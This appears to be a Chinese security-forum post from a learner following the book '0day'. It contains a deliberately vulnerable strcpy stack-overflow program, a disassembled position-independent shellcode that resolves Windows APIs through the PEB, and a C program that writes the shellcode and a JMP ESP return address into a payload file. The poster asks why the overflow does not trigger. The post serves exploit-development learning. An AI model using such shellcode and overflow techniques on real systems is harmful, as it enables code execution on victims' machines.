1.Oday一书中,有如下的漏洞程序:
#include <stdio.h>
#include <windows.h>
#define PASSWORD "1234567"
int verify_password(char *password)
{
int authenticated;
char buffer[200];
authenticated = strcmp(password ,PASSWORD);
// MessageBox(NULL,"wen67867","有问题啊",NULL);
strcpy(buffer,password);//当运行这个函数时候。。发生错误
return authenticated;
}
main()
{
int valid_flag = 0;
char password[1024];
FILE *fp;
LoadLibrary("user32.dll");
if(!(fp = fopen("password.txt","rw+")))
{
MessageBox(NULL,"wenti","有问题啊",NULL);
exit(0);
}
fscanf(fp,"%s",password);
valid_flag = verify_password(password);
if(valid_flag)
{
printf("incorrect password!\n");
}
else
{
printf("Congratulation!You have passed the verification!\n");
}
fclose(fp);
}
2.使用"跳板",和自动定位API,和缓冲区的shellcode 如下
00401028 |. FC cld
00401029 |. 81EC B8010000 sub esp, 1B8
0040102F |? 68 6A0A381E push 1E380A6A
00401034 |? 68 6389D14F push 4FD18963
00401039 |? 68 3274910C push 0C917432
0040103E |? 8BF4 mov esi, esp
00401040 |? 8D7E F4 lea edi, dword ptr [esi-C]
00401043 |. 33DB xor ebx, ebx
00401045 |? B7 04 mov bh, 4
00401047 |. 2BE3 sub esp, ebx
00401049 |? 66:BB 3332 mov bx, 3233
0040104D |. 53 push ebx
0040104E |. 68 75736572 push 72657375
00401053 |? 54 push esp
00401054 |. 33D2 xor edx, edx
00401056 |? 64:8B5A 30 mov ebx, dword ptr fs:[edx+30]
0040105A |. 8B4B 0C mov ecx, dword ptr [ebx+C]
0040105D |? 8B49 1C mov ecx, dword ptr [ecx+1C]
00401060 |. 8B09 |mov ecx, dword ptr [ecx]
00401062 |? 8B69 08 mov ebp, dword ptr [ecx+8]
00401065 |. AD |lods dword ptr [esi]
00401066 |? 3D 6A0A381E cmp eax, 1E380A6A
0040106B |. 75 05 |jnz short 00401072
0040106D |. 95 |xchg eax, ebp
0040106E |? FF57 F8 call dword ptr [edi-8]
00401071 |? 95 xchg eax, ebp
00401072 |? 60 pushad
00401073 |? 8B45 3C mov eax, dword ptr [ebp+3C]
00401076 |. 8B4C05 78 |mov ecx, dword ptr [ebp+eax+78]
0040107A |? 03CD add ecx, ebp
0040107C |? 8B59 20 mov ebx, dword ptr [ecx+20]
0040107F |? 03DD add ebx, ebp
00401081 |. 33FF ||xor edi, edi
00401083 |. 47 ||inc edi
00401084 |> 8B34BB ||/mov esi, dword ptr [ebx+edi*4]
00401087 |. 03F5 |||add esi, ebp
00401089 |. 99 |||cdq
0040108A |? 0FBE06 movsx eax, byte ptr [esi]
0040108D |? 3AC4 cmp al, ah
0040108F |? 74 08 je short 00401099
00401091 |. C1CA 07 ||\ror edx, 7
00401094 |? 03D0 add edx, eax
00401096 |? 46 inc esi
00401097 |.^ EB F1 |\jmp short 0040108A
00401099 |. 3B5424 1C |cmp edx, dword ptr [esp+1C]
0040109D |?^ 75 E4 jnz short 00401083
0040109F |? 8B59 24 mov ebx, dword ptr [ecx+24]
004010A2 |. 03DD |add ebx, ebp
004010A4 |? 66:8B3C7B mov di, word ptr [ebx+edi*2]
004010A8 |? 8B59 1C mov ebx, dword ptr [ecx+1C]
004010AB |. 03DD |add ebx, ebp
004010AD |. 032CBB |add ebp, dword ptr [ebx+edi*4]
004010B0 |? 95 xchg eax, ebp
004010B1 |? 5F pop edi
004010B2 |. AB \stos dword ptr es:[edi]
004010B3 |? 57 push edi
004010B4 |. 61 popad
004010B5 |? 3D 6A0A381E cmp eax, 1E380A6A
004010BA |?^ 75 A9 jnz short 00401065
004010BC |. 33DB xor ebx, ebx
004010BE |? 53 push ebx
004010BF |? 68 6C69796F push 6F79696C
004010C4 |. 68 61736466 push 66647361
004010C9 |? 8BC4 mov eax, esp
004010CB |. 53 push ebx
004010CC |? 50 push eax
004010CD |? 50 push eax
004010CE |. 53 push ebx
004010CF |. FF57 FC call dword ptr [edi-4]
004010D2 |. 53 push ebx
004010D3 |? FF57 F8 call dword ptr [edi-8]
004010D6 |. 90 nop
004010D7 |. 90 nop
004010D8 |? 90 nop
004010D9 |? 90 nop
004010DA |. 90 nop
004010DB |? 90 nop
004010DC |. 90 nop
004010DD |? 90 nop
004010DE |? 90 nop
004010DF |? 90 nop
004010E0 |? 90 nop
004010E1 |. 90 nop
004010E2 |? 90 nop
004010E3 |. 90 nop
004010E4 \. 90 nop
004010E5 90 nop
004010E6 90 nop
004010E7 90 nop
004010E8 90 nop
004010E9 90 nop
004010EA 90 nop
004010EB 90 nop
004010EC 90 nop
004010ED 90 nop
004010EE 90 nop
004010EF 90 nop
004010F0 90 nop
004010F1 90 nop
004010F2 90 nop
004010F3 90 nop
004010F4 90 nop
004010F5 90 nop
004010F6 90 nop
004010F7 90 nop
004010F8 90 nop
004010F9 90 nop
004010FA 90 nop
004010FB 90 nop
004010FC 90 nop
004010FD 90 nop
004010FE ^ E9 25FFFFFF jmp 00401028
3.生成shellcode的程序如下:
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
int main()
{
HANDLE hFile;
PVOID buffer;
DWORD BytesWritten;
char shellcode[] =
"\xFC\x81\xEC\xB8\x01\x00\x00\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B"
"\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A"
"\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03"
"\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B"
"\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x6C\x69\x79\x6F\x68\x61\x73\x64"
"\x66\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x25\xFF\xFF\xFF";
char RetAddress[] = "\x8c\x50\xd8\x77"; //跳板地址
buffer = malloc(217); //申请224个字节的内存,返回一个未确定指向什么数据类型的指针
hFile = CreateFile("C:\\Documents and Settings\\Administrator\\桌面\\123456.txt",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
if(hFile==NULL)
{
printf("bu xing");
}
memcpy((char *)buffer,shellcode,217); //将shellcode所指的内容复制到buffer + 56中,大小为168个字节
memcpy((char *)buffer +208,RetAddress,4); //跳板地址,即JMP ESP的地址
WriteFile(hFile,buffer,217,&BytesWritten,NULL); //将数据复制到文件
CloseHandle(hFile);
return 0;
}
上面shellcode能按照我的想法生成了,但是主程序还是会不成功,我用OD调试了一下主程序
发现fscanf(fp,"%s",password); 这一句只是从文件中复制了9个字节到password,真不知道是神马问题。。这是Oday一书中第三章第4节(我加了缓冲区的使用,但是我也试过按照书本上的来做,也是出现同样的问题,fscanf(fp,"%s",password)只是复制了9个字节)。
望大大,或者实践过这一章的高手们指教下。。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!